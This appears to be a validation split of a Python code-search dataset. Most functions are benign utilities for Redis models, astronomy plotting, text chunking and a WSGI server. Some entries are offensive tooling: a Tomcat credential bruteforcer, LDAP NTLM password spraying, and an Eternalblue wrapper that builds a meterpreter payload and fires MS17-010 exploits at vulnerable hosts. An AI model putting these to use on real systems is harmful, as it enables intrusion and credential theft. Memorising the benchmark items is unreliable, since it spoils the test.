_id | title | partition | text | language | meta_information |
|---|---|---|---|---|---|
q264800 | IndexedRedisDelete.deleteMultipleByPks | validation | def deleteMultipleByPks(self, pks):
'''
deleteMultipleByPks - Delete multiple objects given their primary keys
@param pks - List of primary keys
@return - Number of objects deleted
'''
if type(pks) == set:
pks = list(pks)
if len(pks) == 1:
return self.deleteByPk(pks[0])
objs = self.mdl.objects.getMultipleOnlyIndexedFields(pks)
return self.deleteMultiple(objs) | python | {
"resource": ""
} |
q264801 | string | validation | def string(html, start_on=None, ignore=(), use_short=True, **queries):
'''Returns a blox template from an html string'''
if use_short:
html = grow_short(html)
return _to_template(fromstring(html), start_on=start_on,
ignore=ignore, **queries) | python | {
"resource": ""
} |
q264802 | file | validation | def file(file_object, start_on=None, ignore=(), use_short=True, **queries):
'''Returns a blox template from a file stream object'''
return string(file_object.read(), start_on=start_on, ignore=ignore, use_short=use_short, **queries) | python | {
"resource": ""
} |
q264803 | filename | validation | def filename(file_name, start_on=None, ignore=(), use_short=True, **queries):
'''Returns a blox template from a valid file path'''
with open(file_name) as template_file:
return file(template_file, start_on=start_on, ignore=ignore, use_short=use_short, **queries) | python | {
"resource": ""
} |
q264804 | keywords | validation | def keywords(func):
"""
Accumulate all dictionary and named arguments as
keyword argument dictionary. This is generally useful for
functions that try to automatically resolve inputs.
Examples:
>>> @keywords
... def test(*args, **kwargs):
...     return kwargs
>>> test({'one': 1}, two=2)
{'one': 1, 'two': 2}
"""
@wraps(func)
def decorator(*args, **kwargs):
# Skip over `self` when the wrapped callable is a bound method.
idx = 1 if inspect.ismethod(func) else 0
if len(args) > idx:
if isinstance(args[idx], (dict, composite)):
for key in args[idx]:
kwargs[key] = args[idx][key]
args = args[:idx]
return func(*args, **kwargs)
return decorator | python | {
"resource": ""
} |
q264805 | IRCompressedField.getCompressMod | validation | def getCompressMod(self):
'''
getCompressMod - Return the module used for compression on this field
@return <module> - The module for compression
'''
if self.compressMode == COMPRESS_MODE_ZLIB:
return zlib
if self.compressMode == COMPRESS_MODE_BZ2:
return bz2
if self.compressMode == COMPRESS_MODE_LZMA:
# Since lzma is not provided by python core in python2, search out some common alternatives.
# Throw exception if we can find no lzma implementation.
global _lzmaMod
if _lzmaMod is not None:
return _lzmaMod
try:
import lzma
_lzmaMod = lzma
return _lzmaMod
except ImportError:
# Python2 does not provide "lzma" module, search for common alternatives
try:
from backports import lzma
_lzmaMod = lzma
return _lzmaMod
except ImportError:
pass
try:
import lzmaffi as lzma
_lzmaMod = lzma
return _lzmaMod
except ImportError:
pass
raise ImportError("Requested compress mode is lzma and could not find a module providing lzma support. Tried: 'lzma', 'backports.lzma', 'lzmaffi' and none of these were available. Please install one of these, or to use an unlisted implementation, set IndexedRedis.fields.compressed._lzmaMod to the module (must implement standard python compression interface)") | python | {
"resource": ""
} |
q264806 | IRUnicodeField.toBytes | validation | def toBytes(self, value):
'''
toBytes - Convert a value to bytes using the encoding specified on this field
@param value <str> - The field to convert to bytes
@return <bytes> - The object encoded using the codec specified on this field.
NOTE: This method may go away.
'''
if type(value) == bytes:
return value
return value.encode(self.getEncoding()) | python | {
"resource": ""
} |
q264807 | keep_kwargs_partial | validation | def keep_kwargs_partial(func, *args, **keywords):
"""Like functools.partial but instead of using the new kwargs, keeps the old ones."""
def newfunc(*fargs, **fkeywords):
newkeywords = fkeywords.copy()
newkeywords.update(keywords)
return func(*(args + fargs), **newkeywords)
newfunc.func = func
newfunc.args = args
newfunc.keywords = keywords
return newfunc | python | {
"resource": ""
} |
q264808 | remote_jupyter_proxy_url | validation | def remote_jupyter_proxy_url(port):
"""
Callable to configure Bokeh's show method when a proxy must be
configured.
If port is None we're asking about the URL
for the origin header.
"""
base_url = os.environ['EXTERNAL_URL']
host = urllib.parse.urlparse(base_url).netloc
# If port is None we're asking for the URL origin
# so return the public hostname.
if port is None:
return host
service_url_path = os.environ['JUPYTERHUB_SERVICE_PREFIX']
proxy_url_path = 'proxy/%d' % port
user_url = urllib.parse.urljoin(base_url, service_url_path)
full_url = urllib.parse.urljoin(user_url, proxy_url_path)
return full_url | python | {
"resource": ""
} |
q264809 | setup_notebook | validation | def setup_notebook(debug=False):
"""Called at the start of notebook execution to setup the environment.
This will configure bokeh, and setup the logging library to be
reasonable."""
output_notebook(INLINE, hide_banner=True)
if debug:
_setup_logging(logging.DEBUG)
logging.debug('Running notebook in debug mode.')
else:
_setup_logging(logging.WARNING)
# If JUPYTERHUB_SERVICE_PREFIX environment variable isn't set,
# this means that you're running JupyterHub not with Hub in k8s,
# and not using run_local.sh (which sets it to empty).
if 'JUPYTERHUB_SERVICE_PREFIX' not in os.environ:
global jupyter_proxy_url
jupyter_proxy_url = 'localhost:8888'
logging.info('Setting jupyter proxy to local mode.') | python | {
"resource": ""
} |
q264810 | overview | validation | def overview():
"""
Creates an overview of the hosts per range.
"""
range_search = RangeSearch()
ranges = range_search.get_ranges()
if ranges:
formatted_ranges = []
tags_lookup = {}
for r in ranges:
formatted_ranges.append({'mask': r.range})
tags_lookup[r.range] = r.tags
search = Host.search()
search = search.filter('term', status='up')
search.aggs.bucket('hosts', 'ip_range', field='address', ranges=formatted_ranges)
response = search.execute()
print_line("{0:<18} {1:<6} {2}".format("Range", "Count", "Tags"))
print_line("-" * 60)
for entry in response.aggregations.hosts.buckets:
print_line("{0:<18} {1:<6} {2}".format(entry.key, entry.doc_count, tags_lookup[entry.key]))
else:
print_error("No ranges defined.") | python | {
"resource": ""
} |
q264811 | create_hierarchy | validation | def create_hierarchy(hierarchy, level):
"""Create an OrderedDict
:param hierarchy: a dictionary
:param level: single key
:return: deeper dictionary
"""
if level not in hierarchy:
hierarchy[level] = OrderedDict()
return hierarchy[level] | python | {
"resource": ""
} |
q264812 | line_chunker | validation | def line_chunker(text, getreffs, lines=30):
""" Groups line reference together
:param text: Text object
:type text: MyCapytains.resources.text.api
:param getreffs: Callback function to retrieve text
:type getreffs: function(level)
:param lines: Number of lines to use by group
:type lines: int
:return: List of grouped urn references with their human readable version
:rtype: [(str, str)]
"""
level = len(text.citation)
source_reffs = [reff.split(":")[-1] for reff in getreffs(level=level)]
reffs = []
i = 0
while i + lines - 1 < len(source_reffs):
reffs.append(tuple([source_reffs[i]+"-"+source_reffs[i+lines-1], source_reffs[i]]))
i += lines
if i < len(source_reffs):
reffs.append(tuple([source_reffs[i]+"-"+source_reffs[len(source_reffs)-1], source_reffs[i]]))
return reffs | python | {
"resource": ""
} |
q264813 | level_chunker | validation | def level_chunker(text, getreffs, level=1):
""" Chunk a text at the passage level
:param text: Text object
:type text: MyCapytains.resources.text.api
:param getreffs: Callback function to retrieve text
:type getreffs: function(level)
:return: List of urn references with their human readable version
:rtype: [(str, str)]
"""
references = getreffs(level=level)
return [(ref.split(":")[-1], ref.split(":")[-1]) for ref in references] | python | {
"resource": ""
} |
q264814 | table | validation | def table(cluster):
"""
Create a numpy.ndarray with all observed fields and
computed teff and luminosity values.
"""
teffs = teff(cluster)
lums = luminosity(cluster)
arr = cluster.to_array()
i = 0
for row in arr:
row['lum'][0] = np.array([lums[i]], dtype='f')
row['temp'][0] = np.array([teffs[i]], dtype='f')
i += 1
arr = round_arr_teff_luminosity(arr)
return arr | python | {
"resource": ""
} |
q264815 | round_arr_teff_luminosity | validation | def round_arr_teff_luminosity(arr):
"""
Return the numpy array with rounded teff and luminosity columns.
"""
arr['temp'] = np.around(arr['temp'], -1)
arr['lum'] = np.around(arr['lum'], 3)
return arr | python | {
"resource": ""
} |
q264816 | main | validation | def main():
"""
Checks the arguments to bruteforce and spawns greenlets to perform the bruteforcing.
"""
services = ServiceSearch()
argparse = services.argparser
argparse.add_argument('-f', '--file', type=str, help="File")
arguments = argparse.parse_args()
if not arguments.file:
print_error("Please provide a file with credentials seperated by ':'")
sys.exit()
services = services.get_services(search=["Tomcat"], up=True, tags=['!tomcat_brute'])
credentials = []
with open(arguments.file, 'r') as f:
credentials = f.readlines()
for service in services:
print_notification("Checking ip:{} port {}".format(service.address, service.port))
url = 'http://{}:{}/manager/html'
gevent.spawn(brutefore_passwords, service.address, url.format(service.address, service.port), credentials, service)
service.add_tag('tomcat_brute')
service.update(tags=service.tags)
gevent.wait()
# TODO fix stats
Logger().log("tomcat_brute", "Performed tomcat bruteforce scan", {'scanned_services': len(services)}) | python | {
"resource": ""
} |
q264817 | skyimage_figure | validation | def skyimage_figure(cluster):
"""
Given a cluster create a Bokeh plot figure using the
cluster's image.
"""
pf_image = figure(x_range=(0, 1), y_range=(0, 1),
title='Image of {0}'.format(cluster.name))
pf_image.image_url(url=[cluster.image_path],
x=0, y=0, w=1, h=1, anchor='bottom_left')
pf_image.toolbar_location = None
pf_image.axis.visible = False
return pf_image | python | {
"resource": ""
} |
q264818 | round_teff_luminosity | validation | def round_teff_luminosity(cluster):
"""
Returns rounded teff and luminosity lists.
"""
temps = [round(t, -1) for t in teff(cluster)]
lums = [round(l, 3) for l in luminosity(cluster)]
return temps, lums | python | {
"resource": ""
} |
q264819 | hr_diagram_figure | validation | def hr_diagram_figure(cluster):
"""
Given a cluster create a Bokeh plot figure creating an
H-R diagram.
"""
temps, lums = round_teff_luminosity(cluster)
x, y = temps, lums
colors, color_mapper = hr_diagram_color_helper(temps)
x_range = [max(x) + max(x) * 0.05, min(x) - min(x) * 0.05]
source = ColumnDataSource(data=dict(x=x, y=y, color=colors))
pf = figure(y_axis_type='log', x_range=x_range, name='hr',
tools='box_select,lasso_select,reset,hover',
title='H-R Diagram for {0}'.format(cluster.name))
pf.select(BoxSelectTool).select_every_mousemove = False
pf.select(LassoSelectTool).select_every_mousemove = False
hover = pf.select(HoverTool)[0]
hover.tooltips = [("Temperature (Kelvin)", "@x{0}"),
("Luminosity (solar units)", "@y{0.00}")]
_diagram(source=source, plot_figure=pf, name='hr',
color={'field': 'color', 'transform': color_mapper},
xaxis_label='Temperature (Kelvin)',
yaxis_label='Luminosity (solar units)')
return pf | python | {
"resource": ""
} |
q264820 | calculate_diagram_ranges | validation | def calculate_diagram_ranges(data):
"""
Given a numpy array calculate what the ranges of the H-R
diagram should be.
"""
data = round_arr_teff_luminosity(data)
temps = data['temp']
x_range = [1.05 * np.amax(temps), .95 * np.amin(temps)]
lums = data['lum']
y_range = [.50 * np.amin(lums), 2 * np.amax(lums)]
return (x_range, y_range) | python | {
"resource": ""
} |
q264821 | hr_diagram_from_data | validation | def hr_diagram_from_data(data, x_range, y_range):
"""
Given a numpy array create a Bokeh plot figure creating an
H-R diagram.
"""
_, color_mapper = hr_diagram_color_helper([])
data_dict = {
'x': list(data['temperature']),
'y': list(data['luminosity']),
'color': list(data['color'])
}
source = ColumnDataSource(data=data_dict)
pf = figure(y_axis_type='log', x_range=x_range, y_range=y_range)
_diagram(source=source, plot_figure=pf,
color={'field': 'color', 'transform': color_mapper},
xaxis_label='Temperature (Kelvin)',
yaxis_label='Luminosity (solar units)')
show_with_bokeh_server(pf) | python | {
"resource": ""
} |
q264822 | SHRD._filter_cluster_data | validation | def _filter_cluster_data(self):
"""
Filter the cluster data catalog into the filtered_data
catalog, which is what is shown in the H-R diagram.
Filter on the values of the sliders, as well as the lasso
selection in the skyviewer.
"""
min_temp = self.temperature_range_slider.value[0]
max_temp = self.temperature_range_slider.value[1]
temp_mask = np.logical_and(
self.cluster.catalog['temperature'] >= min_temp,
self.cluster.catalog['temperature'] <= max_temp
)
min_lum = self.luminosity_range_slider.value[0]
max_lum = self.luminosity_range_slider.value[1]
lum_mask = np.logical_and(
self.cluster.catalog['luminosity'] >= min_lum,
self.cluster.catalog['luminosity'] <= max_lum
)
selected_mask = np.isin(self.cluster.catalog['id'], self.selection_ids)
filter_mask = temp_mask & lum_mask & selected_mask
self.filtered_data = self.cluster.catalog[filter_mask].data
self.source.data = {
'id': list(self.filtered_data['id']),
'temperature': list(self.filtered_data['temperature']),
'luminosity': list(self.filtered_data['luminosity']),
'color': list(self.filtered_data['color'])
}
logging.debug("Selected data is now: %s", self.filtered_data) | python | {
"resource": ""
} |
q264823 | modify_data | validation | def modify_data(data):
"""
Creates a tempfile, opens it in an editor (nano) and returns the data afterwards.
"""
with tempfile.NamedTemporaryFile('w') as f:
for entry in data:
f.write(json.dumps(entry.to_dict(
include_meta=True),
default=datetime_handler))
f.write('\n')
f.flush()
print_success("Starting editor")
subprocess.call(['nano', '-', f.name])
with open(f.name, 'r') as f:
return f.readlines() | python | {
"resource": ""
} |
q264824 | modify_input | validation | def modify_input():
"""
This function gives the user a way to change the data that is given as input.
"""
doc_mapper = DocMapper()
if doc_mapper.is_pipe:
objects = [obj for obj in doc_mapper.get_pipe()]
modified = modify_data(objects)
for line in modified:
obj = doc_mapper.line_to_object(line)
obj.save()
print_success("Object(s) successfully changed")
else:
print_error("Please use this tool with pipes") | python | {
"resource": ""
} |
q264825 | bruteforce | validation | def bruteforce(users, domain, password, host):
"""
Performs a bruteforce for the given users, password, domain on the given host.
"""
cs = CredentialSearch(use_pipe=False)
print_notification("Connecting to {}".format(host))
s = Server(host)
c = Connection(s)
for user in users:
if c.rebind(user="{}\\{}".format(domain, user.username), password=password, authentication=NTLM):
print_success('Success for: {}:{}'.format(user.username, password))
credential = cs.find_object(
user.username, password, domain=domain, host_ip=host)
if not credential:
credential = Credential(username=user.username, secret=password,
domain=domain, host_ip=host, type="plaintext", port=389)
credential.add_tag(tag)
credential.save()
# Add a tag to the user object, so we don't have to bruteforce it again.
user.add_tag(tag)
user.save()
else:
print_error("Fail for: {}:{}".format(user.username, password)) | python | {
"resource": ""
} |
q264826 | SharedPathMethods.utime | validation | def utime(self, *args, **kwargs):
""" Set the access and modified times of the file specified by path. """
os.utime(self.extended_path, *args, **kwargs) | python | {
"resource": ""
} |
q264827 | WindowsPath2._from_parts | validation | def _from_parts(cls, args, init=True):
"""
Strip \\?\ prefix in init phase
"""
if args:
args = list(args)
if isinstance(args[0], WindowsPath2):
args[0] = args[0].path
elif args[0].startswith("\\\\?\\"):
args[0] = args[0][4:]
args = tuple(args)
return super(WindowsPath2, cls)._from_parts(args, init) | python | {
"resource": ""
} |
q264828 | WindowsPath2.path | validation | def path(self):
"""
Return the path always without the \\?\ prefix.
"""
path = super(WindowsPath2, self).path
if path.startswith("\\\\?\\"):
return path[4:]
return path | python | {
"resource": ""
} |
q264829 | format | validation | def format():
"""
Formats the output of another tool in the given way.
Has default styles for ranges, hosts and services.
"""
argparser = argparse.ArgumentParser(description='Formats a json object in a certain way. Use with pipes.')
argparser.add_argument('format', metavar='format', help='How to format the json for example "{address}:{port}".', nargs='?')
arguments = argparser.parse_args()
service_style = "{address:15} {port:7} {protocol:5} {service:15} {state:10} {banner} {tags}"
host_style = "{address:15} {tags}"
ranges_style = "{range:18} {tags}"
users_style = "{username}"
if arguments.format:
format_input(arguments.format)
else:
doc_mapper = DocMapper()
if doc_mapper.is_pipe:
for obj in doc_mapper.get_pipe():
style = ''
if isinstance(obj, Range):
style = ranges_style
elif isinstance(obj, Host):
style = host_style
elif isinstance(obj, Service):
style = service_style
elif isinstance(obj, User):
style = users_style
print_line(fmt.format(style, **obj.to_dict(include_meta=True)))
else:
print_error("Please use this script with pipes") | python | {
"resource": ""
} |
q264830 | print_line | validation | def print_line(text):
"""
Print the given line to stdout
"""
try:
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
except ValueError:
pass
try:
sys.stdout.write(text)
if not text.endswith('\n'):
sys.stdout.write('\n')
sys.stdout.flush()
except IOError:
sys.exit(0) | python | {
"resource": ""
} |
q264831 | get_own_ip | validation | def get_own_ip():
"""
Gets the IP from the inet interfaces.
"""
own_ip = None
interfaces = psutil.net_if_addrs()
for _, details in interfaces.items():
for detail in details:
if detail.family == socket.AF_INET:
ip_address = ipaddress.ip_address(detail.address)
if not (ip_address.is_link_local or ip_address.is_loopback):
own_ip = str(ip_address)
break
return own_ip | python | {
"resource": ""
} |
q264832 | pprint | validation | def pprint(arr, columns=('temperature', 'luminosity'),
names=('Temperature (Kelvin)', 'Luminosity (solar units)'),
max_rows=32, precision=2):
"""
Create a pandas DataFrame from a numpy ndarray.
By default use temp and lum with max rows of 32 and precision of 2.
arr - A numpy.ndarray.
columns - The columns to include in the pandas DataFrame. Defaults to
temperature and luminosity.
names - The column names for the pandas DataFrame. Defaults to
Temperature and Luminosity.
max_rows - If max_rows is an integer then set the pandas
display.max_rows option to that value. If max_rows
is True then set display.max_rows option to 1000.
precision - An integer to set the pandas precision option.
"""
if max_rows is True:
pd.set_option('display.max_rows', 1000)
elif type(max_rows) is int:
pd.set_option('display.max_rows', max_rows)
pd.set_option('precision', precision)
df = pd.DataFrame(arr.flatten(), index=arr['id'].flatten(),
columns=columns)
df.columns = names
return df.style.format({names[0]: '{:.0f}',
names[1]: '{:.2f}'}) | python | {
"resource": ""
} |
q264833 | strip_labels | validation | def strip_labels(filename):
"""Strips labels."""
with open(filename) as f, open('processed_labels.txt', 'w') as f1:
for l in f:
if l.startswith('#'):
continue
l = l.replace(" .", '')
l = l.replace(">\tskos:prefLabel\t", ' ')
l = l.replace("<", '')
l = l.replace(">\trdfs:label\t", ' ')
f1.write(l) | python | {
"resource": ""
} |
q264834 | remove_namespace | validation | def remove_namespace(doc, namespace):
'''Remove namespace in the passed document in place.'''
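# Illustrative sketch with a hypothetical namespace:
#   remove_namespace(doc, u'http://www.w3.org/2005/Atom')
# turns tags like '{http://www.w3.org/2005/Atom}entry' into 'entry'.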
ns = u'{%s}' % namespace
nsl = len(ns)
for elem in doc.getiterator():
if elem.tag.startswith(ns):
elem.tag = elem.tag[nsl:]
elem.attrib['oxmlns'] = namespace | python | {
"resource": ""
} |
q264835 | LocalRetriever.match | validation | def match(self, uri):
""" Check to see if this URI is retrievable by this Retriever implementation
:param uri: the URI of the resource to be retrieved
:type uri: str
:return: True if it can be, False if not
:rtype: bool
"""
absolute_uri = self.__absolute__(uri)
return absolute_uri.startswith(self.__path__) and op.exists(absolute_uri) | python | {
"resource": ""
} |
q264836 | hook | validation | def hook(name):
'''
Decorator used to tag a method that should be used as a hook for the
specified `name` hook type.
'''
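# Illustrative sketch (class and hook name are hypothetical):
#   class Engine:
#       @hook('commit')
#       def on_commit(self):
#           pass
#   # Engine.on_commit.__hook__ == ['commit']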
def hookTarget(wrapped):
if not hasattr(wrapped, '__hook__'):
wrapped.__hook__ = [name]
else:
wrapped.__hook__.append(name)
return wrapped
return hookTarget | python | {
"resource": ""
} |
q264837 | CommandLineSyncEngine.addHook | validation | def addHook(self, name, callable):
'''
Subscribes `callable` to listen to events of `name` type. The
parameters passed to `callable` are dependent on the specific
event being triggered.
'''
if name not in self._hooks:
self._hooks[name] = []
self._hooks[name].append(callable) | python | {
"resource": ""
} |
q264838 | CommandLineSyncEngine.configure | validation | def configure(self, argv=None):
'''
Configures this engine based on the options array passed into
`argv`. If `argv` is ``None``, then ``sys.argv`` is used instead.
During configuration, the command line options are merged with
previously stored values. Then the logging subsystem and the
database model are initialized, and all storable settings are
serialized to configurations files.
'''
self._setupOptions()
self._parseOptions(argv)
self._setupLogging()
self._setupModel()
self.dbsession.commit()
return self | python | {
"resource": ""
} |
q264839 | RawlBase._assemble_select | validation | def _assemble_select(self, sql_str, columns, *args, **kwargs):
""" Alias for _assemble_with_columns
"""
warnings.warn("_assemble_select has been depreciated for _assemble_with_columns. It will be removed in a future version.", DeprecationWarning)
return self._assemble_with_columns(sql_str, columns, *args, **kwargs) | python | {
"resource": ""
} |
q264840 | RawlBase._execute | validation | def _execute(self, query, commit=False, working_columns=None):
"""
Execute a query with provided parameters
Parameters
:query: SQL string with parameter placeholders
:commit: If True, the query will commit
:returns: List of rows
"""
log.debug("RawlBase._execute()")
result = []
if working_columns is None:
working_columns = self.columns
with RawlConnection(self.dsn) as conn:
query_id = random.randrange(9999)
curs = conn.cursor()
try:
log.debug("Executing(%s): %s" % (query_id, query.as_string(curs)))
except Exception:
log.exception("Could not render query string for logging")
curs.execute(query)
log.debug("Executed")
if commit:
log.debug("COMMIT(%s)" % query_id)
conn.commit()
log.debug("curs.rowcount: %s" % curs.rowcount)
if curs.rowcount > 0:
#result = curs.fetchall()
# Process the results into a dict and stuff it in a RawlResult
# object. Then append that object to result
result_rows = curs.fetchall()
for row in result_rows:
i = 0
row_dict = {}
for col in working_columns:
try:
#log.debug("row_dict[%s] = row[%s] which is %s" % (col, i, row[i]))
# For aliased columns, we need to get rid of the dot
col = col.replace('.', '_')
row_dict[col] = row[i]
except IndexError: pass
i += 1
log.debug("Appending dict to result: %s" % row_dict)
rr = RawlResult(working_columns, row_dict)
result.append(rr)
curs.close()
return result | python | {
"resource": ""
} |
q264841 | RawlBase.process_columns | validation | def process_columns(self, columns):
"""
Handle provided columns and if necessary, convert columns to a list for
internal storage.
:columns: A sequence of columns for the table. Can be a list,
comma-delimited string, or IntEnum.
"""
if type(columns) == list:
self.columns = columns
elif type(columns) == str:
self.columns = [c.strip() for c in columns.split(',')]
elif type(columns) == IntEnum:
self.columns = [str(c) for c in columns]
else:
raise RawlException("Unknown format for columns") | python | {
"resource": ""
} |
q264842 | RawlBase.query | validation | def query(self, sql_string, *args, **kwargs):
"""
Execute a DML query
:sql_string: An SQL string template
:*args: Arguments to be passed for query parameters.
:commit: Whether or not to commit the transaction after the query
:returns: Psycopg2 result
"""
commit = None
columns = None
if kwargs.get('commit') is not None:
commit = kwargs.pop('commit')
if kwargs.get('columns') is not None:
columns = kwargs.pop('columns')
query = self._assemble_simple(sql_string, *args, **kwargs)
return self._execute(query, commit=commit, working_columns=columns) | python | {
"resource": ""
} |
q264843 | RawlBase.select | validation | def select(self, sql_string, cols, *args, **kwargs):
"""
Execute a SELECT statement
:sql_string: An SQL string template
:columns: A list of columns to be returned by the query
:*args: Arguments to be passed for query parameters.
:returns: Psycopg2 result
"""
working_columns = None
if kwargs.get('columns') is not None:
working_columns = kwargs.pop('columns')
query = self._assemble_select(sql_string, cols, *args, **kwargs)
return self._execute(query, working_columns=working_columns) | python | {
"resource": ""
} |
q264844 | RawlBase.get | validation | def get(self, pk):
"""
Retrieve a single record from the table. Lots of reasons this might be
best implemented in the model
:pk: The primary key ID for the record
:returns: List of single result
"""
if type(pk) == str:
# Probably an int, give it a shot
try:
pk = int(pk)
except ValueError: pass
return self.select(
"SELECT {0} FROM " + self.table + " WHERE " + self.pk + " = {1};",
self.columns, pk) | python | {
"resource": ""
} |
q264845 | Eternalblue.create_payload | validation | def create_payload(self, x86_file, x64_file, payload_file):
"""
Creates the final payload based on the x86 and x64 meterpreters.
"""
with open(os.path.join(self.datadir, x86_file), 'rb') as x86_fp:
sc_x86 = x86_fp.read()
with open(os.path.join(self.datadir, x64_file), 'rb') as x64_fp:
sc_x64 = x64_fp.read()
with open(os.path.join(self.datadir, payload_file), 'wb') as fp:
fp.write(b'\x31\xc0\x40\x0f\x84' + pack('<I', len(sc_x86)))
fp.write(sc_x86)
fp.write(sc_x64)
"resource": ""
} |
q264846 | Eternalblue.combine_files | validation | def combine_files(self, f1, f2, f3):
"""
Combines the files 1 and 2 into 3.
"""
with open(os.path.join(self.datadir, f3), 'wb') as new_file:
with open(os.path.join(self.datadir, f1), 'rb') as file_1:
new_file.write(file_1.read())
with open(os.path.join(self.datadir, f2), 'rb') as file_2:
new_file.write(file_2.read()) | python | {
"resource": ""
} |
q264847 | Eternalblue.detect_os | validation | def detect_os(self, ip):
"""
Runs the checker.py script to detect the OS.
"""
process = subprocess.run(['python2', os.path.join(self.datadir, 'MS17-010', 'checker.py'), str(ip)], stdout=subprocess.PIPE)
out = process.stdout.decode('utf-8').split('\n')
system_os = ''
for line in out:
if line.startswith('Target OS:'):
system_os = line.replace('Target OS: ', '')
break
return system_os | python | {
"resource": ""
} |
q264848 | Eternalblue.exploit | validation | def exploit(self):
"""
Starts the exploiting phase; you should run setup before running this function.
If auto is set, this function will fire the exploit at all systems. Otherwise a curses interface is shown.
"""
search = ServiceSearch()
host_search = HostSearch()
services = search.get_services(tags=['MS17-010'])
services = [service for service in services]
if len(services) == 0:
print_error("No services found that are vulnerable for MS17-010")
return
if self.auto:
print_success("Found {} services vulnerable for MS17-010".format(len(services)))
for service in services:
print_success("Exploiting " + str(service.address))
host = host_search.id_to_object(str(service.address))
system_os = ''
if host.os:
system_os = host.os
else:
system_os = self.detect_os(str(service.address))
host.os = system_os
host.save()
text = self.exploit_single(str(service.address), system_os)
print_notification(text)
else:
service_list = []
for service in services:
host = host_search.id_to_object(str(service.address))
system_os = ''
if host.os:
system_os = host.os
else:
system_os = self.detect_os(str(service.address))
host.os = system_os
host.save()
service_list.append({'ip': service.address, 'os': system_os, 'string': "{ip} ({os}) {hostname}".format(ip=service.address, os=system_os, hostname=host.hostname)})
draw_interface(service_list, self.callback, "Exploiting {ip} with OS: {os}") | python | {
"resource": ""
} |
q264849 | Eternalblue.exploit_single | validation | def exploit_single(self, ip, operating_system):
"""
Exploits a single ip, exploit is based on the given operating system.
"""
result = None
if "Windows Server 2008" in operating_system or "Windows 7" in operating_system:
result = subprocess.run(['python2', os.path.join(self.datadir, 'MS17-010', 'eternalblue_exploit7.py'), str(ip), os.path.join(self.datadir, 'final_combined.bin'), "12"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
elif "Windows Server 2012" in operating_system or "Windows 10" in operating_system or "Windows 8.1" in operating_system:
result = subprocess.run(['python2', os.path.join(self.datadir, 'MS17-010', 'eternalblue_exploit8.py'), str(ip), os.path.join(self.datadir, 'final_combined.bin'), "12"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
return ["System target could not be automatically identified"]
return result.stdout.decode('utf-8').split('\n') | python | {
"resource": ""
} |
q264850 | make_server | validation | def make_server(host, port, app=None,
server_class=AsyncWsgiServer,
handler_class=AsyncWsgiHandler,
ws_handler_class=None,
ws_path='/ws'):
"""Create server instance with an optional WebSocket handler
For a pure WebSocket server ``app`` may be ``None``, but an attempt to access
any path other than ``ws_path`` will cause a server error.
:param host: hostname or IP
:type host: str
:param port: server port
:type port: int
:param app: WSGI application
:param server_class: WSGI server class, defaults to AsyncWsgiServer
:param handler_class: WSGI handler class, defaults to AsyncWsgiHandler
:param ws_handler_class: WebSocket handler class, defaults to ``None``
:param ws_path: WebSocket path on the server, defaults to '/ws'
:type ws_path: str, optional
:return: initialized server instance
"""
handler_class.ws_handler_class = ws_handler_class
handler_class.ws_path = ws_path
httpd = server_class((host, port), RequestHandlerClass=handler_class)
httpd.set_app(app)
return httpd | python | {
"resource": ""
} |
q264851 | AsyncWsgiServer.poll_once | validation | def poll_once(self, timeout=0.0):
"""
Poll active sockets once
This method can be used to allow aborting server polling loop
on some condition.
:param timeout: polling timeout
"""
if self._map:
self._poll_func(timeout, self._map) | python | {
"resource": ""
} |
q264852 | AsyncWsgiServer.serve_forever | validation | def serve_forever(self, poll_interval=0.5):
"""
Start serving HTTP requests
This method blocks the current thread.
:param poll_interval: polling timeout
:return:
"""
logger.info('Starting server on {}:{}...'.format(
self.server_name, self.server_port)
)
while True:
try:
self.poll_once(poll_interval)
except (KeyboardInterrupt, SystemExit):
break
self.handle_close()
logger.info('Server stopped.') | python | {
"resource": ""
} |
q264853 | write_index_translation | validation | def write_index_translation(translation_filename, entity_ids, relation_ids):
"""write triples into a translation file."""
translation = triple_pb.Translation()
for name, index in entity_ids.items():
translation.entities.add(element=name, index=index)
for name, index in relation_ids.items():
translation.relations.add(element=name, index=index)
with open(translation_filename, "wb") as f:
f.write(translation.SerializeToString()) | python | {
"resource": ""
} |
q264854 | write_triples | validation | def write_triples(filename, triples, delimiter=DEFAULT_DELIMITER, triple_order="hrt"):
"""write triples to file."""
with open(filename, 'w') as f:
for t in triples:
line = t.serialize(delimiter, triple_order)
f.write(line + "\n") | python | {
"resource": ""
} |
q264855 | read_translation | validation | def read_translation(filename):
"""Returns protobuf mapcontainer. Read from translation file."""
translation = triple_pb.Translation()
with open(filename, "rb") as f:
translation.ParseFromString(f.read())
def unwrap_translation_units(units):
for u in units: yield u.element, u.index
return (list(unwrap_translation_units(translation.entities)),
list(unwrap_translation_units(translation.relations))) | python | {
"resource": ""
} |
q264856 | read_openke_translation | validation | def read_openke_translation(filename, delimiter='\t', entity_first=True):
"""Returns map with entity or relations from plain text."""
result = {}
with open(filename, "r") as f:
_ = next(f) # pass the total entry number
for line in f:
line_slice = line.rstrip().split(delimiter)
if not entity_first:
line_slice = list(reversed(line_slice))
result[line_slice[0]] = line_slice[1]
return result | python | {
"resource": ""
} |
q264857 | overview | validation | def overview():
"""
Prints an overview of the tags of the hosts.
"""
doc = Host()
search = doc.search()
search.aggs.bucket('tag_count', 'terms', field='tags', order={'_count': 'desc'}, size=100)
response = search.execute()
print_line("{0:<25} {1}".format('Tag', 'Count'))
print_line("-" * 30)
for entry in response.aggregations.tag_count.buckets:
print_line("{0:<25} {1}".format(entry.key, entry.doc_count)) | python | {
"resource": ""
} |
q264858 | main | validation | def main():
"""
Main credentials tool
"""
cred_search = CredentialSearch()
arg = argparse.ArgumentParser(parents=[cred_search.argparser], conflict_handler='resolve')
arg.add_argument('-c', '--count', help="Only show the number of results", action="store_true")
arguments = arg.parse_args()
if arguments.count:
print_line("Number of credentials: {}".format(cred_search.argument_count()))
else:
response = cred_search.get_credentials()
for hit in response:
print_json(hit.to_dict(include_meta=True)) | python | {
"resource": ""
} |
q264859 | overview | validation | def overview():
"""
Provides an overview of the duplicate credentials.
"""
search = Credential.search()
search.aggs.bucket('password_count', 'terms', field='secret', order={'_count': 'desc'}, size=20)\
.metric('username_count', 'cardinality', field='username') \
.metric('host_count', 'cardinality', field='host_ip') \
.metric('top_hits', 'top_hits', docvalue_fields=['username'], size=100)
response = search.execute()
print_line("{0:65} {1:5} {2:5} {3:5} {4}".format("Secret", "Count", "Hosts", "Users", "Usernames"))
